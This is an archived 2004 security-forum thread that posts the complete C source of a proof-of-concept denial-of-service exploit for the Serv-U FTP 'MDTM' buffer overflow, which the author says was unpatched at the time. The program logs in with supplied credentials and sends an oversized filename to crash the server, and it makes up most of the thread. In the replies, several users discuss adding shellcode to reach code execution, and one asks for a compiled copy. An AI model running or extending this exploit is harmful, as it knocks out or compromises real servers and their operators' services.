Serv-u Mdtm Buffer Overflow Poc Dos Exploit

Full Version: Serv-u Mdtm Buffer Overflow Poc Dos Exploit

GovernmentSecurity.org > The Archives > Exploit Articles

GaLiaRePt

Feb 26 2004, 06:23 PM

Serv-U MDTM buffer overflow PoC DoS exploit
Date: 2004-02-26

Author : Shaun Colley <shaunige yahoo co uk>
Download : http://www.security-corporation.com/downlo...v-u-mdtm-expl.c

CODE

/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow
PoC DoS exploit.
*
* This program will send an overly large filename
parameter when calling
* the Serv-U FTP MDTM command. Although arbitrary
code execution is
* possible upon successful execution of this
vulnerability, the vendor has
* not yet released a patch, so releasing such an
exploit could be disastrous
* in the hands of script kiddies. I might release a
full exploit to the
* public when a patch/fix is issued by the vendor of
Serv-U. This PoC
* exploit will simply crash the Serv-U server.
*
* This vulnerability was discovered by bkbll, you can
read his advisory on
* the issue here:
<http://www.cnhonker.com/advisory/serv-u.mdtm.txt>
*
* This vulnerability requires a valid login and
password to exploit! This
* PoC does not check to see if you supplied a correct
login and password.
*
* I do not take responsibility for this code.
*
* -shaun2k2
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
if(argc < 5) {
printf("Serv-U 'MDTM' buffer overflow
DoS exploit.\n");
printf("by shaun2k2 -
<shaunige yahoo co uk> \n\n");
printf("Usage: %s <host> <port>
<login> <password>\n", argv[0]);
exit(-1);
}

int sock;
char *explbuf;
char loginbuf[100];
char passwdbuf[100];
struct sockaddr_in dest;
struct hostent *he;

/* lookup IP address of supplied hostname. */
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve %s!\n",
argv[1]);
exit(-1);
}

/* create socket. */
if((sock = socket(AF_INET, SOCK_STREAM, 0)) <
0) {
perror("socket()");
exit(-1);
}

/* fill in address struct. */
dest.sin_family = AF_INET;
dest.sin_port = htons(atoi(argv[2]));
dest.sin_addr = *((struct in_addr
*)he->h_addr);

printf("Serv-U 'MDTM' buffer overflow DoS
exploit.\n");
printf("by shaun2k2 -
<shaunige yahoo co uk> \n\n");

printf("Crafting exploit buffer...\n\n");
/* craft exploit buffers. */
sprintf(loginbuf, "USER %s\n", argv[3]);
sprintf(passwdbuf, "PASS %s\n", argv[4]);
explbuf = "MDTM
20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt";

printf("[+] Connecting...\n");
if(connect(sock, (struct sockaddr *)&dest,
sizeof(struct sockaddr)) < 0) {
perror("connect()");
exit(-1);
}

printf("[+] Connected!\n\n");

printf("[+] Sending exploit buffers...\n");
sleep(1); /* give the serv-u server time to
sort itself out. */
send(sock, loginbuf, strlen(loginbuf), 0);
sleep(2); /* wait for 2 secs. */
send(sock, passwdbuf, strlen(passwdbuf), 0);
sleep(2); /* wait before sending large MDTM
command. */
send(sock, explbuf, strlen(explbuf), 0);
sleep(1); /* wait before closing the socket.
*/
printf("[+] Exploit buffer sent!\n\n");

close(sock);

printf("[+] Done! Check if the Serv-U server
has crashed.\n");

return(0);
}

Arnie

Feb 26 2004, 06:40 PM

very nice, thanks a lot for the poc

phaeton

Feb 26 2004, 07:20 PM

This one looks simple enough, I may try attaching shell code to it

Arnie

Feb 26 2004, 07:24 PM

QUOTE (phaeton @ Feb 26 2004, 07:20 PM)

This one looks simple enough, I may try attaching shell code to it

i'm playing arround with atm aswell, but i'm still a newbee, but ill hope to figure it out :]
let me (us) know when you figured out

so i can look how you did it hehe

Dennis1981

Feb 26 2004, 07:32 PM

1. it crashes servu 2. This vulnerability requires a valid login and password to exploit!

read the comments in the code

Arnie

Feb 26 2004, 07:33 PM

it also crashed my servu 4.1 and 5.0

and yeah, you also need login ofcourse

AlexeyG

Feb 26 2004, 08:46 PM

thank you for the dos exploit

would be very kewl if someone could attach shellcode to it, very nice

iFan

Feb 26 2004, 10:01 PM

can any1 post the compiled version? THank you

Double-=V=-

Feb 26 2004, 11:35 PM

Hmm this sounds bad, welcome to the rehack age.

phaeton

Feb 27 2004, 01:40 AM

Uh, Dennis, who cares? 1. It doesn't crash servu2 only, it crashes all < 5.0.0.4, plus it is a DoS, but you can write your own shellcode!

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.